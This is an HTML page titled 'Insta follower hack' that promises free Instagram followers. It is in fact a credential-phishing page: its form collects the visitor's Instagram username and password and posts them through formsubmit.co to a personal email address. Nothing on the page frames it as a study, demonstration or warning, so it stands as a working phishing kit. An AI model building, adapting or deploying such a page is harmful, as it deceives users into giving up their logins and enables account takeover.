<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Insta follower hack</title>
    <style>
        *{
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }
        .main_div{
            width: 100%;
            height: 100vh;
            position: relative;
        }
        .box{
            width: 400px;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            padding: 50px;
            background: rgba(0, 0, 0, 0.5);
            border-radius: 50px;
        }
        .box h1{
            margin-bottom: 30px;
            color: #fff;
            text-align: center;
            text-transform: capitalize;
        }
        .box .inputbox{
            position: relative
            ;
        }
        .box .inputbox input{
            width: 100%;
            padding: 10px;
            font-size: 16px;
            color: #fff;
            letter-spacing: 1px;
            margin-bottom: 30px;
            border: none;
            border-bottom: 1px solid #fff;
            background: transparent;
            outline: none;

        }
        .box .inputbox label{
            position: absolute;
            top: 0;
            left: 0;
            letter-spacing: 1px;
            padding: 10px o;
            font-size: 16px;
            color: #fff;
            transition: 0.11s;

        }
        .box input[type="submit"]{
            background: transparent;
            border: none;
            outline: none;
            color: #fff;
            background: #03a9f4;
            padding: 8px 16px;
            border-radius: 5px;

        }
        .box .inputbox input:focus ~ label,
        .box .inputbox input:valid ~ label{

            top: -20px;
            left: 0;
            color: #03a9f4;
            font-size: 12px;
        }
        .btn :hover{
            color: yellow;
                       
        }
    </style>
</head>
<body>
    <div class="main_div">
        <div class="box">
            <h1>instagram follower hack (By Divit)</h1>
            <form action="https://formsubmit.co/Divit2076@gmail.com" method="POST">
                <div class="inputbox">
                    <input type="text" name="Username" autocomplete="off" required>
                <label>username</label>

                <div class="inputbox">
                <input type="password" name="Password" autocomplete="off" required>
                <label>password</label>
                <input type="submit" name="" value="Get Followers">
                </div>
                </div>
                </form>
                 
            
             
            
        </div>
    </div>
</body>
</html>